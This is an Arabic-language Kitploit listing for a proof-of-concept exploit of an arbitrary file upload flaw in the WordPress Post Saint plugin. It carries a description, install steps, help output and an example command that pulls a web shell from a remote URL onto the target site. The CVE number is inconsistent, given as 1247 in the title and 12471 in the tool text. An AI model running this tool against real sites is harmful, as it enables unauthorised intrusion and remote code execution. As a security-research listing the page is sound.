Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-1247-PoC — إضافة Post Saint <= 1.3.1 لـ WordPress: رفع ملف تعسفي | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-1247-poc
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2024-1247-poc

CVE-2024-1247-PoC

إضافة Post Saint <= 1.3.1 لـ WordPress: رفع ملف تعسفي

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-1247-PoC

إضافة Post Saint <= 1.3.1 لووردبريس ثغرة رفع ملفات عشوائية

الوصف

إن إضافة Post Saint لووردبريس (الإصدارات حتى 1.3.1) معرضة لثغرة رفع ملفات عشوائية بسبب عدم وجود فحوصات الصلاحيات والتحقق من نوع الملف. يمكن للمهاجمين الموثقين الذين لديهم على الأقل صلاحيات مشترك استغلال هذه الثغرة لرفع ملفات عشوائية، مما قد يؤدي إلى تنفيذ أكواد عن بعد.

الميزات

  • يكتشف إصدارات الإضافة المعرضة للخطر.
  • يسجل الدخول إلى ووردبريس باستخدام بيانات الاعتماد المقدمة.
  • يستغل الثغرة لرفع ملفات عشوائية.

الاستخدام

المتطلبات الأساسية

  1. تثبيت بايثون 3.8 أو أحدث.
  2. تثبيت المكتبات المطلوبة:
root@kitploit:~
  
pip install requests packaging urllib3

الاستخدام -help

root@kitploit:~

 CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -ru REMOTE_URL, --remote_url REMOTE_URL
                        Remote URL of the shell file to inject

مثال:

root@kitploit:~
python CVE-2024-12471.py -u <Base URL> -un <Username> -p <Password> -ru <Remote Shell URL>

إخلاء مسؤولية

هذا السكريبت لأغراض تعليمية وبحثية فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها هو غير قانوني وغير أخلاقي.

تنزيل الأداة